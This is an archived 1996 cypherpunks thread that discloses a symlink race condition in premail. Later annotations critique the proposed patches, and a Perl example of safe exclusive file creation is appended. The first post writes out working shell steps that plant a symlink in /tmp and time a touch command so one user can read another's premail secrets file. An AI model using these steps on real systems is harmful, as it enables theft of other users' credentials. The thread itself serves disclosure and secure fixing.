From xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail Mon Dec 23 13:36:10 1996
Path: xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail
From: Mixmaster
Newsgroups: list.cypherpunks
Subject: Security hole in premail
Date: 21 Dec 1996 05:20:39 +0100
Organization: XS4ALL, networking for the masses
Lines: 54
Sender: daemon@basement.replay.com
Message-ID: <199612210235.VAA03805@dhp.com>
NNTP-Posting-Host: basement.replay.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-XS4ALL-Date: Sat, 21 Dec 1996 05:20:44 MET
X-Comment1: This message did not originate from the
X-Comment2: above address. It was automatically remailed
X-Comment3: by an anonymous mail service. Please report
X-Comment4: problems or inappropriate use to
X-Comment5:
Precedence: bulk

There's a pretty nasty bug in premail that allows any non-root user to
obtain the contents of the premail secrets file. This is a race
condition that can be exploited because an indefinite amount of time
can pass between the time that premail checks if the secrets file
exists and when it tries to write to the file.

It can be exploited as follows:

attacker:

$ umask 111
$ ln -s ~/premail-secrets-file /tmp/.premail-secrets.$<

normal user:

$ premail -login
Remember to logout when done.
Your premail passphrase, please:

All the attacker has to do is execute "touch premail-secrets-file"
between the time that the user is prompted for the passphrase and the
time when the login is completed.

$ ls -al premail-secrets-file
-rw-rw-rw- 1 d00d nogroup 19 Dec 20 19:01 premail-secrets-file
$ cat premail-secrets-file
[contents of premail secrets file]

This bug can be fixed in two ways. One way is to set the
premail-secrets setting to some non-world-writable directory.
The second way is to apply the following patch:

*** premail.orig Fri Dec 20 18:46:01 1996 --- premail Fri Dec 20 18:55:54 1996 *************** *** 3574,3579 **** --- 3574,3582 ---- } for ($triesleft = 2; !$done && $triesleft; $triesleft--) { $pass = &getpass ($x); + if(!-O $ps) { + &error ("Secrets file exists and is owned by another user\n"); + } $status = &decrypt_secrets ($ps_pgp, $ps, $pass); if (!-s $ps) { unlink $ps; } $done = (!$status && -e $ps);

From xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail Mon Dec 23 13:36:36 1996
From: Mixmaster
Newsgroups: list.cypherpunks
Subject: Re: Security hole in premail
Date: 22 Dec 1996 07:45:30 +0100
Organization: XS4ALL, networking for the masses
Lines: 39
Sender: daemon@basement.replay.com
Message-ID: <199612220408.XAA03397@dhp.com>
NNTP-Posting-Host: basement.replay.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-XS4ALL-Date: Sun, 22 Dec 1996 07:45:36 MET

On Fri, 20 Dec 1996, Mixmaster wrote:

> *** premail.orig Fri Dec 20 18:46:01 1996 > --- premail Fri Dec 20 18:55:54 1996 > *************** > *** 3574,3579 **** > --- 3574,3582 ---- > } > for ($triesleft = 2; !$done && $triesleft; $triesleft--) { > $pass = &getpass ($x); > + if(!-O $ps) { > + &error ("Secrets file exists and is owned by another user\n"); > + } > $status = &decrypt_secrets ($ps_pgp, $ps, $pass); > if (!-s $ps) { unlink $ps; } > $done = (!$status && -e $ps);

That patch doesn't work. It will always return an error.
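Review bot: the added check `+ if(!-O $ps) {` fails in the common case, because `-O` is false when $ps does not exist yet, which is the normal state at login, so every run reaches `&error`; the condition needs an existence guard, `if (-e $ps && !-O $ps)`, and because both `-e` and `-O` stat through symlinks it also needs an `-l $ps` test to reject a link planted at that path. Even corrected, a test placed before `&decrypt_secrets` keeps the gap between check and write that the original report is about; the durable fix is to create the file exclusively (O_CREAT|O_EXCL) or to keep it in a directory nobody else can write to, as the first suggestion in the report does.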
I have tested the following patch and it does work as intended:

*** premail.orig Wed Oct 30 22:25:10 1996 --- premail Sat Dec 21 15:45:41 1996 *************** *** 3631,3636 **** --- 3631,3639 ---- $invoc .= ' > '.$ps; $invoc .= ' 2> '.$errfile; &pdv ("Invoking PGP as $invoc\n"); + if(-e $ps) { + &error ("Premail secrets file already exists\n"); + } $status = &open_pgp ($invoc, $pass, ''); $err = &read_and_delete ($errfile); &pdv ($err);

Sorry about the previous mistake.
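Review bot: `+ if(-e $ps) {` placed just before `&open_pgp` narrows the window but does not close it, and it misses the exact case in the report: `-e` stats through a symlink, so a dangling link at $ps whose target is created later tests false, and the `' > '.$ps` redirection in $invoc is then opened by the shell following that link. Add `-l $ps` to the test so a link at the path is rejected outright, and to remove the race itself have premail create $ps with sysopen(O_WRONLY|O_CREAT|O_EXCL, 0600) and write PGP's output through that handle rather than letting the shell create the file.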
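As an added example, written for this page and not code from premail or from either post, here is the secrets-file creation done in Perl (premail's language) without any check-then-write gap: the open itself refuses an existing file or a planted symlink, and an fstat on the descriptor confirms what was created. The names open_secrets and verify_secrets_fh, and the temporary directory used for the demonstration, are assumptions made for this illustration.

```perl
#!/usr/bin/perl
# Added example, not premail's own code. Creates the decrypted secrets
# file without a gap between "does it exist?" and "write it": the open
# call itself fails if anything already sits at the path. open_secrets
# and verify_secrets_fh are names invented for this illustration.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL O_NOFOLLOW);
use File::Temp qw(tempdir);

# Exclusive, symlink-refusing creation with mode 0600. O_CREAT|O_EXCL
# makes open(2) fail with EEXIST when the path already exists, and that
# includes a symbolic link, dangling or not, so a link planted in a
# shared directory is never followed. O_NOFOLLOW is belt and braces.
sub open_secrets {
    my ($path) = @_;
    my $fh;
    sysopen($fh, $path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600)
        or return undef;    # caller reports "$path: $!" and aborts the login
    return $fh;
}

# Defence in depth on the descriptor we actually hold (fstat, not a
# second path lookup): regular file, owned by our real uid, no bits for
# group or other. Returns 1 when the file is safe to write secrets into.
sub verify_secrets_fh {
    my ($fh) = @_;
    my @st = stat($fh) or return 0;
    my ($mode, $uid) = @st[2, 4];
    return 0 unless -f $fh;        # a regular file, not a fifo or device
    return 0 unless $uid == $<;    # owned by the real user running premail
    return 0 if $mode & 0077;      # nobody else may read or write it
    return 1;
}

# Demonstration in a private temporary directory (constructed here).
# A dangling symlink stands in for a link someone left at the secrets
# path: the exclusive open refuses it instead of following it.
my $dir = tempdir(CLEANUP => 1);
my $ps  = "$dir/.premail-secrets";
symlink("$dir/target-created-later", $ps) or die "symlink: $!";
my $fh = open_secrets($ps);
die "BUG: link was followed\n" if defined $fh;
print "refused: $!, login aborted\n";

# With nothing at the path the file is created fresh, 0600, owned by us.
unlink $ps or die "unlink: $!";
$fh = open_secrets($ps) or die "create $ps: $!";
verify_secrets_fh($fh) or die "unexpected state, aborting\n";
print $fh "decrypted secrets would be written here\n";
close $fh or die "close: $!";
print "secrets file created privately\n";
```

In premail the `' > '.$ps` redirection in $invoc would have to become a write through the handle open_secrets returns (for instance by dup'ing it onto the child's stdout before PGP runs), so that the shell never creates the file itself; the ownership check on the descriptor is only a backstop, since by the time a path test runs after the fact the write has already happened.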